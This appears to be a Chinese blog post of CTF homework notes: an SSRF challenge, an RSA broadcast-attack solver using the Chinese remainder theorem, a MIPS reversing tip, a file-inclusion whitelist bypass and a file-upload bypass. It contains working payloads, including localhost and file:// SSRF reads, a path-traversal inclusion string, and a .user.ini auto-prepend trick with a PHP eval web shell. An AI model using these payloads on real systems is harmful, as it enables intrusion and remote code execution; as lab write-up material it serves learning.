当前位置: 首页 > news >正文

1.27作业

news 来源:原创 2025/5/6 8:52:04

1web351

 #web351

curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result=curl_exec($ch);

echo ($result);

【提示不允许外部】对应源码:$_SERVER(remoteaddr):

?url=http://127.0.0.1/flag.php

伪协议可以读:url=file:///var/www/html/flag.php

2

import gmpy2
import  binascii
 
#利用中国剩余定理求解同余方程,aList:余数,mList:模数
def CRT(aList, mList):
    M = 1
    for i in mList:
        M = M * i   #计算M = ∏ mi
    #print(M)
    x = 0
    for i in range(len(mList)):
        Mi = M // mList[i]   #计算Mi
        Mi_inverse = gmpy2.invert(Mi, mList[i]) #计算Mi的逆元
        x += aList[i] * Mi * Mi_inverse #构造x各项
    x = x % M
    return x
 
if __name__ == "__main__":
    #========== n c ==========
    n1 = "636585149594574746909030160182690866222909256464847291783000651837227921337237899651287943597773270944384034858925295744880727101606841413640006527614873110651410155893776548737823152943797884729130149758279127430044739254000426610922834573094957082589539445610828279428814524313491262061930512829074466232633130599104490893572093943832740301809630847541592548921200288222432789208650949937638303429456468889100192613859073752923812454212239908948930178355331390933536771065791817643978763045030833712326162883810638120029378337092938662174119747687899484603628344079493556601422498405360731958162719296160584042671057160241284852522913676264596201906163"
    c1 = "310020004234033304244200421414413320341301002123030311202340222410301423440312412440240244110200112141140201224032402232131204213012303204422003300004011434102141321223311243242010014140422411342304322201241112402132203101131221223004022003120002110230023341143201404311340311134230140231412201333333142402423134333211302102413111111424430032440123340034044314223400401224111323000242234420441240411021023100222003123214343030122032301042243"
    n2 = "302240000040421410144422133334143140011011044322223144412002220243001141141114123223331331304421113021231204322233120121444434210041232214144413244434424302311222143224402302432102242132244032010020113224011121043232143221203424243134044314022212024343100042342002432331144300214212414033414120004344211330224020301223033334324244031204240122301242232011303211220044222411134403012132420311110302442344021122101224411230002203344140143044114"
    c2 = "112200203404013430330214124004404423210041321043000303233141423344144222343401042200334033203124030011440014210112103234440312134032123400444344144233020130110134042102220302002413321102022414130443041144240310121020100310104334204234412411424420321211112232031121330310333414423433343322024400121200333330432223421433344122023012440013041401423202210124024431040013414313121123433424113113414422043330422002314144111134142044333404112240344"
    n3 = "332200324410041111434222123043121331442103233332422341041340412034230003314420311333101344231212130200312041044324431141033004333110021013020140020011222012300020041342040004002220210223122111314112124333211132230332124022423141214031303144444134403024420111423244424030030003340213032121303213343020401304243330001314023030121034113334404440421242240113103203013341231330004332040302440011324004130324034323430143102401440130242321424020323"
    c3 = "10013444120141130322433204124002242224332334011124210012440241402342100410331131441303242011002101323040403311120421304422222200324402244243322422444414043342130111111330022213203030324422101133032212042042243101434342203204121042113212104212423330331134311311114143200011240002111312122234340003403312040401043021433112031334324322123304112340014030132021432101130211241134422413442312013042141212003102211300321404043012124332013240431242"
    
    cList = [int(c1,5), int(c2,5), int(c3,5)]
    nList = [int(n1,5), int(n2,5), int(n3,5)]
    m_e = CRT(cList, nList) #计算m^e
    for e in range(1, 10):  
        m, f = gmpy2.iroot(m_e, e) 
        print("加密指数e = %d:"%e)
        m = hex(m)[2:]
        if len(m)%2 == 1:
            m = m + '0' 
        flag = binascii.unhexlify(m)
        print(flag)

3

是mips程序(ida需要下插件),反编译我用的ghidra

4.1

含一个白名单和文件包含函数 include $_REQUEST['file']   

白名单:source.php或hint.php

绕过读取:

?file=source.php?/../../../../../../ffffllllaaaagggg

4.2

 检查文件头部信息,文件MIME类型,黑名单了php和htacess

.user.ini:

GIF89a 
auto_prepend_file=1.jpg


1.jpg:

GIF89a 
<?=eval($\_POST['cmd']);?>

5三体

兽音解密,base58,16进制转字符,凯撒密码

压缩包密码为英文threebody

相关文章:

  • C语言的内存分配:malloc和free
  • 【精调】LLaMA-Factory 快速开始4 自定义个一个sharegpt数据集并训练
  • 使用 C++ 和 gRPC 的常见陷阱及解决方案
  • Ubuntu 下 nginx-1.24.0 源码分析 - ngx_atoi 函数
  • 自注意力机制和CNN的区别
  • 安装Bash completion解决tab不能补全问题
  • 普通人怎样用好Deepseek?
  • leetcode刷题记录(一百一十六)——5. 最长回文子串
  • AutoGen 技术博客系列 九:从 v0.2 到 v0.4 的迁移指南
  • 【多语言生态篇四】【DeepSeek×Rust:安全内存管理实践】
  • 断开ssh连接程序继续运行
  • 【进程 】
  • Windows系统本地部署DeepSeek-R1+本地知识库+联网搜索+Agent功能
  • 每日定投40刀BTC(4)20250218 - 20250222
  • Linux 驱动入门(5)—— DHT11(温湿度传感器)驱动
  • 迎接2025,立个flag
  • uniapp 中使用天地图,安卓端、h5
  • 解析多模态、Agent与Code模型的演进
  • 用Python实现Excel数据同步到飞书文档
  • 如何选择近视泳镜的度数
  • 国铁集团:铁路五一假期旅客发送量累计已超1亿人次
  • 美国加州州长:加州继续对中国“敞开贸易大门”
  • 中虎跳峡封闭仍有游客逆行打卡,景区:专人值守防意外
  • 融创中国清盘聆讯延至8月25日,清盘呈请要求遭到部分债权人反对
  • 商务部新闻发言人就中美经贸对话磋商情况答记者问
  • 426.8万人次!长三角铁路创单日客发量历史新高